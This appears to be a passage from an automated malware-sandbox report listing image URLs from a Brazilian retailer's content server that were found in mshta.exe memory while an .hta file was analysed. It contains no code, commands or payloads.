https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngQ
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngX
Source: mshta.exe, 00000000.00000003.25395346989.0000000009516000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443915061.000000000951D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngdd69a1.pn
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngnas.com.b
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngx
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.png
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458668902.00000000094C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.png0x450-316
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pngE
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pnge
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pngg
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pnggd
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484225410.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395079124.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TV-dc4baf9a9983.png
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395079124.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410501035.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460710979.0000000009492000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/27/432x540-416b11512524.png
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000095A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/27/432x540-416b11512524.png-3ef281a2ba9f.jpg
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/27/432x540-416b11512524.png3
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.png
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngi
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngrt
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngsa
Source: mshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483932947.0000000009451000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.000000000944F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410939908.000000000A94C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/250x260-atalho-desk-app-baixe-o-app1-fb5282b
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478295458.000000000AADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411110659.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429764625.0000000009C1E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437805828.0000000009C1F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000095A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png.png
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.pngH
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.pngP
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.pngg
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478295458.000000000AADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411110659.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png.png4
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png8
